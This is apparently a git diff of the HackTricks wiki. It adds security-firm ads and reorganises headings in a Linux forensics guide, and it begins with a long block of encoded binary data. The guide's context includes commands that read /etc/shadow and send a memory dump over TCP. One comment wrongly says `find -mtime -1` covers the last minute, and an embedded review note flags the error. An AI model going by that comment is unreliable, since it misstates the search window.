zYwY#r%s6pp?0ZJ`%sf_-altKlYXPV7e>+nXk5jn!Gbx#re|?mX&8?1unxMD@so=Ar zvoEl3M?J8%m6wQTtO?XT8MQN-TZMlc^><8)$@aNZcj!zrq+?aqo->et6J@|pU?eDP z)+sQs=hb~R^lYwnfYb1wJ}IB{&fN}^W9uNB~H*Lf}NiZs`!QOtLhZS=RZE^ zU4dP+jbl}HwM5ofAt+pjjcYkg|33V;8S3S$7CcLS5O&~qny?_6a`t8={$+DdYk;I1 z#sraMtey|8WelTDRhu}Sahv1t`4EwHetT;dTGHPa{Qasabptvcwf`(DW~fj&V?aMc z($8(jOqGGv-*u5*SuQ=?@^o3K;`mbN+Ohim60>!5v9;%#)Q(@?b}Gf>`0uYP zDQKWsTT>rT0rAC-l}MXKREKfHaO{z+I#ppO>d2Md@Oig>;!dU6@bUn0&3}JVaiRWx zT&%hdtQK;q(2{vvv}0DBjW9u+H#{8S-G7~D?d4Nbz-jZFs=s=K3ZtN6@8rmpDbS;W z(C+1!Y^z7={eQowJ}F}jHh%wfWE;_%tOoN9P7>^H+k(>)MOaRzhJxMw^X=q1)wKq~ zeuYZzB7)|Nr?`MQ&MiMuR=js;@4DNI7=}E#nMqCg(<$-i+snPGS4O z@aUTnSLH!tPz6g!eB+>3=T}r!7QS)1tG*}y4Ex$+1;PWjxfk2Lhpb>jtZU?Owy5B? z=iwwa*$P-WzR0U^(q@)V4|qG?FqTo%3bO@!_5{S*Y2jUu<7;(~wV`(wz+ITi27bl= z^H;lZL&86?(krH?&us=>1M4i?TSwPkwS$46@VIE#Z1VlB@*l>(5KA!uSMOtC{;^#V z#aJH+8R^fl{OlaY5gkA1ttNP`q|x&}jqy@n34$#)eTRtCKC&(}S-#BGy5IYEpx$<9p99XtaciyGc554wvrJF!GgIYz zkIp}XKW0{^Yks-rry@w3oc-weG@n`CeR$^>cdLGK2q(eT?!2szAa&FH|L8nv1?2NW97Wsw2-L=KMLsyJ4&+m-C~N@v^VY@CYx{NGi0^yn@p8IE(8O z>))pST_*jJZOVnM-|FUgF-8b@89ZP*k+rN$5C-y*kHa za{Xj~&atfc+=}qJxTI&~WnFQW2)^{kV9?RcQ0l~5w0*4b_qYG{$$tL*9R^qJaUnDTLtTv8Wy>YX;1zuE7mACMs8 zU49GOHGaeZYAT;4eO)@c4+2u{$m@Ssi=4yt#$|%)Q2kD`vc=tB4lh)wU@XQy2T|T1^iuyJO`w>Y_o;4+XGVE(; z{y$n%cprA!I(kpNosEdP@6gfY(JuD1=ZaOIfDi9M&MtMnH|Ij^z_{ON-{?Hnqi;hG zF#<&K`nd{=rT4npx!n!dVAHSqsRP;sPFXm*?mx<{5;Ev;9h~#&u>N1a#R-0kECqwZ zQLUKnsG^R{F?&yE9^pY$Zk8R|KB7%vS??@7w|w5!?8nM z9KBI}*==Qh&0?KJHvoPbK!;yc^+^V+Wy%J!!eRY)O8lLs>U8y!kLe!Nr7*5()vO@$ z921YuSFi&l!@JTesVRmuzI_WA^s3!a=6=yU|I;dc1Trt$hIsRQV6+AXH=X4{Us^Tk zzVIALO{)9*#=os$jdqblw&E0j&oNwHovR+xjoue`?OPrS%V5^y9uwua4lv>k@oq63 z;_S)}R@LQ;KpI2LI1*=;4b1?C-?+k3tZxE+vx_aruyJOKIG--MQd;OlyfD># z_)VDNTobXdPlnC+-S}$ye=G<+BSmB;JB)Gl(pj$G-JpJnnbp2V262A8@ZiJIDK>rt zOPkYfhM=7TW@f42JeM+dhB({bmi_I}{`w@5{;ge3E;+B{UvQ%{ZNt|6Lc_w#O~qBnpu;6|hSjBW%|r$<<_A%H{A%tsPY?dnFNI4|M--=e8K2;LoFL^cX*9 
ztsF;{%fMQHU%)ODePhWf`3k<>comgIPXCbGmQkZv(JlFJm;U`$R=EBq_edvNP4o61FycplAlk|$lEV{4567zH=&oP*veRseDY+^aw7O$(-@|rwQ3oJw4X^mCYMOuOXtqCRCe@_SX zcI)B^Uy~U3*R+VU^VgD{FnyLI-Mr;I_g~?4;)q$aPTtiOM6a~5)vmKO0%U{dMCCtB z8c_II`ZL)l4*JY;RX_5z{m5cy+VMrt^M;R9TW$X?`}a&g74Ds>=)th3ZdrVEGTU&n?reZ@<>eak^< zq#`?AW0xMmY!4^r6q>5V!~f^lTbwls&YU2@q2Js3^$V?0rb(l=(ke7@s6Ed`=%Ur*}W;Wy1iPnb2s z>xth$#h1w+Tm{UFn?{`v%BxW|0z7dFrlyfA2p-z%dA=aIYx0{Q@Cn}1f^R}`&qa{S zXl&)hPLt$XRBj^r>X0)=^peHhpN2LE?Xs`3cyVejuePiajt?78IUfMq1?H%%iJQ@0 zA<&R)gP0QX?*a{nSKnvV0E!UqKv!=dxfR62-enZggfbqwQ+dkmirr2nw?bEWYc zD0{TKU#cHY_PFM&gW|F;xqeTF>_FMZp}%S5X~m(A-P&`7*q5zDv>ry75RihWnjb82 zd}*7hj`k0p{{3L|?AIj<#?0mG4$|p-_?z@Kp3e3yM->~`XY2EsY*cH%RkC^QxxjHU z`bO?V4@usC!>ae>ILi56cp338gID*xrx&{3yP<1Y=XxZ%uj^UWE-L5y^!ySh+(tBS zH;3BzUFr=yfS2px)e;H6?^x3=rTf_KX6S!AxUm~1Fd*Jar@Y(Z`V*~jIH12q zGiyosxJ;am7yoad`#Wv&y(e$PZ&Y9yH?r`jAUh?Cpm7&KD-8n#^0X{Ol%IZ$WXd(0 z384g2YEbSM{kW5wIf74)d+7U}qJN;w&}&8K-pN)mNuf#uccPA@;Qwfs7Ce4K-YD~a zTeAskijR9s)VV_;_crGnb?mbwlgynrDuGW5yzD69XtX+r8~tmBKO4o&G5S6+OP$|D z!JS|xHgu;tOyW>n8ybM{|Bs=q)Tc6+^d}mu5(3{Zu$Z+>RHo*oAy2Vi*-4ooqK4ae zf8$IYoPn8lKU@w=t_gGkXjSgEUx4!Gi+O}~=h_Te{{ByLvyu6{k$<+MkOntgHT8>pTptAYvU% zOB%T#(_f$aeRDv`YeK=ItL2}a%Duec(=kjeyzbtdub{V%ap`_xxx{t;2t)|6x6+|pgYf7G79SQ2huntk5u9Tnlj}X9{1av@jY;mQf%O` zhzh^-_nuiy*}1%ORBki&dMd1KFn+A;Cht4Wts8wPfF)2 z9)_-5oR#ACrunDm@BdAs_`^cduTfxB$y#f6%iStTzf5*C)fE2B+(x74f0{XuIEV=_ zQp#oS69Zw+uo~jFK;ImhB-o>?doTgc{kcV|#%JhLSb3p$10=G#>I5Sr5B*0_1Szoo z29v)XtDa|VGkV!_Gv&o^H2dwrvvt_n3Ss-2IzSVslE22hJa`DOGOQeKKip5~f>v3f z)6%-qi0*CMc=vFa}3EFC$`j|nYz58q$Gr5w&(38H2jf&+@`m%8-dbtFy~o@?|B z<7{m`r2Xnj5W&|Y1Xcfcq1rNX60|vXqFCyFQ6&^fIU4(XzCzUg`yR^?MatLF_N}1N zaok7Xu4e4`msDz@iN4iAFwGcef<)7M%zBpUMQd{JSLZK5Jdk-dag|+45TWV3JWId5 z;}ZE#C=LOYT#%vC5v8;79T+74n;;=)3zo3BEp>HC^rnX5EXg>?JY4*2g{XOZUvXl0 zdE2yqN(&2idRh_6vFF-uP}4)czGQlS1^=YfS$K3BiXV}-L;@B3H*8K?>r?q6hA|Ca z6R;4`ekyAx+zOC9><-UqoPltJ%=rwyH`|*v0+U>z)rF=Sf1>jg4@B#2zijv2LpjS` 
zI02sZ9S{vA{b)cqRU>dpjbc|RSQ~oS{cPyh>uReViKTyoDV36x3i9yNK?qKBDC-&YgMxUkFBqOin80@A7)?>r4&Ruln{{a7C~fa0Yw1`>F%!KLqTaN zK~fkRDM=+p5s;P`I!2I`5~S;Y2EXs#`~Tg$mdmBYJ16#j_OqY8&w2BW-c<|aiinjo zaPIZHv?r$I&3s((Z3sBN+P&W?(LKFK*L^s2UrlOV#gbtkX6^7E2``uwh+OZ>K=>>v zLx2zV|H_}^bng=ux9!v+aBli}h+9xCy+tWL>Jodu5WT)R`>hnx0C zCgAGrG9y|`8Ho;X{fXr<^J|t~0U7I0NKsy`B0LFf5~7lNc}KDFS%B|G#v8HJtq|Xw za4%RsHeF5m*!(}Jd{n{ra|tAq@YMFc9?lgwYY8A#(E+cb!yJWfMzD;z@*O7WQz1Wh z+u)xyPG=3(PgmEn9*mA0&D6F5(O}{(T&V|zpXTu2X+l&{E@F4Poyz0x%s|&*t`xN6piu#}s^R!Imkb{!-g1pHuxRfktilKlt!3%a1C_eYv}%7V$CL zt3GjgI&kK6uT-Pf`%uYqpmC@DaK>xW<+;2KKEM#!Ro%`TuirInEa%N_QQYiKerhl5 ztT}z>dmGcI?%IW8$8pw+Bbo5N$&~ywBM~sOG?D+xn{BPtg>cl^M+|$#{(+EOAU@?q zNR`~)g|%NWxP?IX^a=Jfb0V`LY?!EwIsvZ5Sbu9OEPcFr%fz%3U$Ru3z*iN1FJgU- zh;qH&TQ;#o?fc9%AOhAGY@uzalK=1I3j3>t$4)a$U+MiWZJ?SmSi_u~8f`-B%Q;(? zT#wqNpc!E0@Lc)d?>^vloZjoPxn&#}iEX3uiB;iz#O~>gXHq#M4UyCSu{!8vqf169RcR(G{m|fKdXH8ul#f`sN3}>_U zVnDuwW`Wc#`pnQwi&nYMF;nD%zI02H(UM*#cx1v8q4mfq#)|*m@}8{a^W1g=f4y>v z+j4!c`ZO~nY$MB~dmCBTHhJ1jIA1J*qkY+#+fStL)BwN;+0 zTr-t_b`m?mD|R#Prqdoxr&QqOP#&Sh*Ef=K8oKmMyEHM9e*g2K4(bgX95Am(1X)%s z4xH~Ai9msnG$4Su@jIEC+-C_Y7^d;)lRLP!qBD4BRiP@{Cj*Fy0{q%K+-N1Hw+-Ko z_~+DbQkr;kBwVWQO)ehzzr&7uqoMkKy$;-KKGEISJOm=TUn#(47q|t|SMQivhR%NQ ztf>XF%-Wcvg}mJLY11P34x{UjNSpurAnidLo2?VMF)poF_D$Tm4@TZKEb|EbUQi{* zA;4TY*fc`NY<{yM`Bw>I|7)r$>N2?XThPAAZ#ToY*USLwmQ@WhV|Bz@eW4TmwVziK zV|Q8IkB^+-ceOJTg6ICbiJ*|Cni{H??{{x+nCY$8a}4C>Z+D^JRC@Vz<##T<_mV0& zXX5h4WiGE0t_3l8wK;;utbZ)xp9!HXhknN|7ZndqIX-|~&+v;lqC?In@T1cmlJG%tgYeXm6@}Da%=Op)v9a`H0;^N^cr znV(~&PHnZ|1y1!3ZoaF(e|Cf`KHcpx9iFIa_`R9-L2g~*q7Dc3>+vH@-Jn+h=6w0I z@6s#sxR3`hc~k8R^4klDzL(nU6Mu1fnXvz&(%(gXpE>bAz`3z#{-FrSHN=MYtXcH# z{KY?oKs1~7Cwh*WKojfwnGg@@UW_-&JIQv^PWBU=N-Z1k>=(P)u%Crjlum<=`C~l~ zzQ_v`?-M$UeiOKm8i~9&%RJt_1Udr2T5|Hy6P`ER*i5IX?K$Q{-jl$(r{~B!Ta+Gh zbqt9u)h*J7T(>#(Rjs<(hvGNuJd)#Pt9s%k+U?yXj%n*_OK&Rfg5jQZg`Ds{#E@)N z>}#qKO&vFBc2890AMm&BaruML3w<5#Zk&MXzzt1Uv!u;OKR(Q-^E`R}ZNkokwdcru zYc_;(npW(L?{|0Jd{8Z2!Kyl5ufVzO4sGb69XTERII(ZUUnGfipAQ~UB+&lp{4?If 
zh$?K#%0Zj(Ba0ruF9tMjA4}N1-<6DfEA~X~tsfPSQ?%LF#t|XE_LFxkanm!7jRz~A zn}vR{!4eyVz#M*3{$aS}g#GQoe0gczw%|QZ-<1sG5`OtOQkHX;vz0TJ+wN3fB!}Ga z*;5d;y6;0hqG&?ADZP0eG{$KqQ(93!0LxkEctrTOjaET4^88{z-8t1Eha(e~mf@95lQa|?XDVmdk#_~}JgZvleY(jy?$)sGMYbk4lF)Ba&n#Kz#> zCmyQ9^ex&{+5-D@{`KEato|e$Kp0iSpv)`zRSew;^)Yr*}Xe@YB&Lt8yFPIpvT0 z2WEDQHwF;bv)b^t%2#R7E9yb}VC_(*ulxrX)!&<=^O*bLpp4cY47?>@@p!lJ|O zd}6j(9CgWG8@D=Vs)aMrH2Jk)9lEGJ5d(4IA=b+Pj0nDLU;m*x$H^8UQ zC(W6h8##|+Dob)Lz<>c!->qM0<4WZ+;D&da2L%IE)Svd(uBx~@)rv8A8N<-!c0sC@ z%e@b;AU1}_l{PYrbDSnL2L%^wmVV|m%#J6#HX?Ao+eJJjv0nAW=}+?goA)P%xd(%+ zC2nN3aREzm4ZNgWySLIaBKQ9v#k2Tjs#O)N6uQQSW9Z|tEs&%y7GrLa3+% znim8yTjOYOZ}9!6;bC&bh7M!Jt$?3>J6S@D{T6G4p|^3fS$Gk06B0Vayqp`^gp#!5 zlR|n-Z|gHYy8MXh5vety5|n4-U_&QZ78|u<_jG6HI`A*(reQK=KHc(Nt_Y~JwDZO4 zCodfXd24X3nJB|uwtx2MvUrLk9>@~sYx?7xFCBBNRmHuNyK_*Kshuq2mXY~7gcMf< z=y}?I6fCkdeR#ut(n|=^QhLImldi^r@Y#M1_Gk-f8jEVXLfGGdMkqb4SfgTZl>$0$ zAv}%$I%nTWB((f;ISfF7NIA>556P+Y4^F&jOr{R}^MU!kM=OAv!h?dtKBGqMUN#il z>j%q0!WM-i`koGS8!YgL^)s_RT|v8+n2Wm7SoAgXla{?bTn(uZM0s zEOrPlj5?6<$9J||nJ#IXhOpzA6-wXweiwVd&lz38uKf9rt7@ma2u|I>ML-8SnFAGU zmhj**T|LN0y=iX*xe5PHnm#dAy@dO3fGVHy;3M!dW!01Tn3`*h`Bl5@z(zX5 z#?Tdia^PtmwQvNz;`@%%!pV5BGtw_Z3MfXeje=9a`?uR3--P_sGY)$gB*sRXJrQgW zY}bMkuj%M2xLW64y8olURYH1X?~A-UtFu8Tq8fS)@=@4iiW}0*I+aKs<9H+TKpMl!+U0+5h`(sM3IeaXzIikA48`&x zvTG~3f}eAm)G$R}TdG~&-5ECA*aw@)t2^N?wqQlrN~_|1gx!M$!P>w#gXk4G+U2Vf zzrV8mduQUPJ|`|y$%76XoFVq*3+}&m)MuKEwYit^dg4*{wxSa2DP5T@{xb%Ma8edXt*_=|9K8S>+2 z)Fa2g1f?qVEqy%gdY$5AE`lS^uUsV;+vME?fVYS#Ptg&iB|g0}SZr|vVM|JYZNZEn zT*zC|OvtX!DDh95$|=r&FZ*+6iw}3b*m)6}Hf!ojV8Nkqoza@rJv#T+T(gEPy`=g-jX?0Z7@ALSHxpr zvLd9}3c(z~#mING_SeK9ywD5~675{b2}m9WI-uEf*~u5ibh922vdGBgxSe{W$m|& zxCt`-)BB)0&@v7d>(|Mz{B>H!<4l_=E; zbVv|8i1ssHA*UYCh|>nUD(OQ0L9tnhFkVFf(g(a5i1`DEShm&Yu?hogJZK-3U6KYQQH^=xn zlStm9s=mk%(GvFWfxE^7Ql;rX;>7^7cBNNb^Y}n!Oqf&{;x7y6%h~W_`xt1RRcx>3 z95bzcm_vs%SFwJcg>N-6XxUG82o9TL9v{?F4(a`eeYSMCM=bgQ4j;>k`PSE-`Jqeb z5ByPqB;#Xn0Md@oXK)X~L=-=(n{$g3N766slR1m>550hVgQww3Qxo=6c|6R(b2d*m 
z-Esb(q)y*V4$LNry?a({_u^Dg3fL(_IyN*Yf zMLuIKRAPVC6UB^+ibKx8Cn>~{olzT8s&(~7SbCE^e$FOScedPIU$b8@^stgyhA7@T z&YC?E76X*M1P4u)VZ6nIzAmzx?(k)L3c`NEp9M0HukAaABcz{1HL@aL{TB@Zf{c(n z7xw-qNCJ*uyRU%~Op%X6l`x2%4n6VjOa%jA<;mmc+ z_{$P_zw-?|BHU~de=!VeBJqFT`K&nN=dodsA0UPgf8KqQ4R8*uLaN(z=_;8&Yb$Fh zas2F>s6rfy?Hkk(Fa%c<(riH8yOfl*hi92D2B#KG4iyAXP}Vg|zFqI9UvTm>QS7vtyy$;jEqsvB zTf?7994u2N#7ZZ{TyG;fThK>fEjg2ku%F%MN#PCB?6>FxPIiGtT02Bs(vTLmNc@E; zN&Ku@3kwPF-#}0#-H(VU9Kt+?HxY@)G9x-a&(CR29nAc(|H|(qigC6qq}dKgKbPxM zar)=^n}b_&ZPoT~d~y=^>r;Nc!F*weUub^LUR&fg*p?yUIDMvl$7qFLCkYdYI@=#; zQLKf$?_g<;)F`#G)W0`Vgap|9TVV4cXeMCuoEC$~jlZiEsI~{`%3`#S#;u9NbCDBZ zk7TS4#@XlBn7(uIZn*ui>uZGlToU#MvKQ!6pI*_7UoY~CLoNJX1KTBbo)&_`HTD{L zboA{|9e`(?cR6C@EEZk<7WNAT0H3{@_|jdKCQ4p}vQCyXJKZfIKT3OYmjrCvx2Hk1 z!0I9QEMtc*U?=HAv4$qf;S+L|v}TAnxDNN6F0#r=9?gI#iMs(WkqlvFm1a1 zT@e{dE-F@j21^sxXa zADD3?v}t7lNYeg2R76NehkMAP7l8lXfTbqzlC~RX%}*yOOyB|Cc@g)!r&zt zirg4+CT_en05_r$zQNJwAjmhzY}+M&bOj=(D)2G|ldKXq@QbxvO{wewGAdXmm=9_N ztA#p^h{Ji%mmd-Umj{1H@<3=42c)?Xq^Lm@`?dYCtR&f8?U|L^PjKVNra{Y+Gz7)y ze*r(XKRcBWSU3#oB|jFYXDk^$dw0`&|=8U z5%1S$#+_?jHekJb-moDGmw{m>L=L=xM&=3zZ#0e+Pe2Iq!tl~XUMS$FnS1;>p)z0s z=q)pshsX33$ayjgiJ4X6s!(|_IgqoUsy+&uYBvm?lM)dZ$#T#u9jj#qq2nH6R=z{g8gM%#u|5T+Y||xmxV)fzR7&VE^=Vo{tlI z#F+SiL5b!f2G_8||Kp999KFYq1&5&DnUju@?PC}#ruXHX=GYjW32x01;D8am;t}ND z;!RZ<@S-acG!IxC8_3xn2^WRkdSIVyAY}i-=6w@66K{>(oh}f48Q5D@?P5J+XKV7k z&2a%6H=-+bJoBg|a6d_OL4RomEK=F!Xy#)4)2C5!s65HAUPv$C8-3`^U>QNRKr-x8 z)xXcvguHDfCoTmJ>5Zkn@%DoaeqPh3&F$!{lkWyIJ4d@=P8R!`&5GaG#7N?F>0+SG z|CDH>IBKd1xk92}?hay~N_&HB4f#EN3tA$elL$^t$B+IRIoic5(`uv3Cgo`v= zza&lUR;z>N&XWF*4?gFP5P$<2+iz{FPVu4ux75~HnY%*+weM)%=# zvZ4iB!nNRQMP>Iua#ke5hH?Fw zY^{hE#X0=t@EQ5ENwoa&PD8!pjwBX_Nshsu6bJRdr%N-0I3Q&Y%uc}#=$rP*lt+>F zdAtxwyRCa1`nhjmLN!scb!nlFfn{?!3foFS}o=0hSE z93DxPe>V(R7C|N!j}Ue}Z0A?PTiZA&YefHE+4+pBKOCkA7C^gUMz&40f8$+?dJ;wt z>yllF4jyBtl>=Ll`?&l0BdSiV)*lC&Pm0@wMk`ZPeS@Fg`0J;xe0G) zBISJYk8tfy)j-0uMBm_aI7RYvQeC^D$*oi0;ihSFjVtIy;mAH5U4v#sm+CsAX_tD6 
z!7)>aNO&hx{z76e9XbTPhL#I%Us)zY`4oq_kY7di1P2uFIMYp^5u)#MmR&78{_f`} z<3cV2orE0UPz%=_y;7(V!-M1lk^Jcd{=_rN6?EHeJ&|bxp-sdig`%>n$$RPrgJ4bg zoC%$|H)F-9a`iJZ;j#}}ZZ%x+7gGx#8RCKg&%5xVh}-i7y6+rSS;?LF;DEQ>QZy4J z+kkfKVpkL5$FJ;PNepwb{7$FK{wjCA3h**Zx%a1sDVTsdYH{h@9!-E~0}|sS!W=4R zx75PVMwUiSFw!F3$qCvLuXlAhhGYobQE8LoH4!}{yriFH%M2SuN9!d$D=tTPG3jx; zvCr};SPYyV572AQ2Udg?jgXK5@3N2DmFwBQh~g(*piZWTy;m0wjG_VCf|7R4)>8qH ztyvY7;m_+_)vslA)lxGogFvpJCbm19-;W(s$BB~@qKN(^_aFpP0%_Zai#zk$innnn zl!;K5WVPielk!dIJTm5?F(iJL`B2LFs8kG+A4SjrrI~9*7kW#>vL)j9Ke1A|ss`=$f+%4L_@1p?@9(1O~FAsQd zIWs3(Oyy2;k}=3jP^++{h@5Q@(`fj7bq-;(SUigYR$T~!AZh_*L`7(?U_PNuj^#xM zV_AHEl6`u&jLJvcT{`uJi^b?-kS|?0o=(kMH1M2&w%_+T^dA=Md8a;ac^D52kiuCB z)G#`{&zJ~Ad+xuQ1YVN03kK)iB=V$&s6KLspG(Y|{_&irb*?RAG=2tP*0tzXQ*HO| zryUGWqMU|}V5Ar0XB&MkDen+%UISV_ZQWm;;o6UB@zN0UN*%ty1QemtApGN~Ix1WckgEq-LqX-+Tmov$8XKH4tiC-~l^`$0p$NUpn( zuYnKf0k0Hyx_?ARKV#>?MTYhPnR~=6vwl16sIg}%$oA-*`4TYxD)aEBMPQ+b zosRuDdkWf0^%o)5iu8)@kTPg9hcSh(SXQO$AUDW=L6Yjq$Pn?Qw-|4xSbo3@&tL(N z*-2mp^yM(;$0TuQ{`86lk5p52K+2n6c~O46iHfj)fwM+nLhJEeE}rvfbd<6ygoz!w zNg~9a`^JY{*>50N6EfT|UN#S6E`fJ?XSmUhv$`?F6Bej$aknHD?5{Vy;&hAN#Q#_) zStH@x5>Qwd8au|*(7*M5?*tyu^-i*{@4Uq?pvf^7W#65>r3;kSp=aRv5O28nMQZK# zqlyPRL@&JXmAW+kkh@t{_DwC5OM%82J=6RVLQvC{^PSHUYUQTLi^l`klq|LuQqW)FOc-CA{O<>PS36O>67ZxaC3L35 zt7bJXqejl7Eox!mt~MON`dqMC9%fK1qgJJ% zX?Eu;0^|u~XZ%j{qxK`M7a>cR(1R#91?%C^`}M)Q{QzYh{*rtIz8(fbYmrC7&IaTx zGQ?WK;7W(+TgHiJD>{8aWRdXClBJ?{P%)t1y3i};NQYCc_~~YFWhP$VtOvQ#upJuU z6qU0^TL+`l0|(nhy(3W@DJjxy`6HMbs9|V59%JF@)2d&_oLfn6b&8 zv~GE#6c}aT9gE4QYw&5zRq(D>|A3KIj}C$I)u&U+W+q|_HvdLteOHaVuHFr#A4$ko zDLt{k1??K&U_MQ8pZvJDv8;tYx_a#39)J(gd!`atI5y^X&eUxtC{A|vrB{4MqE86J zUcnNtfII9tuyUZ3%jD1Ka6|knT;C3XRh}Km}dheU0+3GTH77W&N1bMgbAzM~_ zu1^_)3RIG*?-7VN8Pzos&k+@b;({Tlhxi(_U)It!J`_v&a~EIbU9(b2p||poW6zyb z`8XBWK`!PoQB9vnM0QW4-_h8yBVYS9AW*!+I0Cg$3F0;2`o3ZD%Yxb~E32?3C@au0 zgkNuSq*V1_vxBhKLdt4Zp-O(W}`4! 
diff --git a/README.md b/README.md index a57aae86..4419ecea 100644 --- a/README.md +++ b/README.md
@@ -60,12 +60,21 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm ![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (13).png>) -**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform** +**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.** -**Bug bounty tip**:**sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} +### [SecurityBoat](https://securityboat.in) + +![](<.gitbook/assets/SB logo black\_034525.png>) + +**Securityboat** is a cybersecurity company focused on providing top of the line **penetration testing services** and the most comprehensive **automated security testing** solutions based on an extensive **manual security testing methodology** that utilizes various case-specific and **industry-tested** solutions. They are committed to providing clear communication on cybersecurity issues, developing solutions, and prioritizing **business risk**.\ +**Make the right choice by contacting us for your security:** + +{% embed url="https://securityboat.in/contact-us" %} + ### [**INE**](https://ine.com) ![](<.gitbook/assets/INE\_Logo (3).jpg>) diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md index 0b5fb1ae..0b5ed10d 100644 --- a/forensics/basic-forensic-methodology/linux-forensics.md +++ b/forensics/basic-forensic-methodology/linux-forensics.md @@ -1,4 +1,4 @@ - +# Linux Forensics

@@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Initial Information Gathering +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -## Basic Information +## Initial Information Gathering + +### Basic Information First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries: @@ -48,7 +54,7 @@ cat /etc/shadow #Unexpected data? find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory ``` -### Suspicious information +#### Suspicious information While obtaining the basic information you should check for weird things like: @@ -56,7 +62,7 @@ While obtaining the basic information you should check for weird things like: * Check **registered logins** of users without a shell inside `/etc/passwd` * Check for **password hashes** inside `/etc/shadow` for users without a shell -## Memory Dump +### Memory Dump In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\ In order to **compile** it you need to use the **exact same kernel** the victim machine is using. 
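Review bot: in the `@@ -48,7 +54,7 @@` hunk, the context line `find /directory -type f -mtime -1 -print` is commented as finding files modified "during the last minute", but `-mtime -1` matches files modified within the last 24 hours. Since these lines are being touched for the heading change anyway, either correct the comment to say "last day" or use `-mmin -1` if a one-minute window is what is meant; an examiner relying on the comment would misjudge the time window they searched.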
@@ -81,14 +87,14 @@ LiME supports 3 **formats**: LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` -## Disk Imaging +### Disk Imaging -### Shutting down +#### Shutting down First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\ There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. -### Taking an image of the disk +#### Taking an image of the disk It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information. @@ -101,7 +107,7 @@ dcfldd if= of= bs=512 hash= hashwindow=) -# Inspect AutoStart locations +## Inspect AutoStart locations -## Scheduled Tasks +### Scheduled Tasks ```bash cat /var/spool/cron/crontabs/* \ 
@@ -235,7 +241,7 @@ cat /var/spool/cron/crontabs/* \ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ``` -## Services +### Services It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries. @@ -248,11 +254,11 @@ It is extremely common for malware to entrench itself as a new, unauthorized ser * _**/etc/systemd/system**_ * _**/etc/systemd/system/multi-user.target.wants/**_ -## Kernel Modules +### Kernel Modules On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware. -## Other AutoStart Locations +### Other AutoStart Locations There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware. 
@@ -260,11 +266,11 @@ There are several configuration files that Linux uses to automatically launch an * _**∼/.bashrc**_ , _**∼/.bash\_profile**_ , _**\~/.profile**_ , _**∼/.config/autostart**_ are executed when the specific user logs in. * _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel. -# Examine Logs +## Examine Logs Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service. -## Pure Logs +### Pure Logs **Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\ Interesting system logons: @@ -291,7 +297,7 @@ Interesting system logons: Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. {% endhint %} -## Command History +### Command History Many Linux systems are configured to maintain a command history for each user account: @@ -300,7 +306,7 @@ Many Linux systems are configured to maintain a command history for each user ac * \~/.sh\_history * \~/.\*\_history -## Logins +### Logins Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\ It's recommended to check if those logins make sense: 
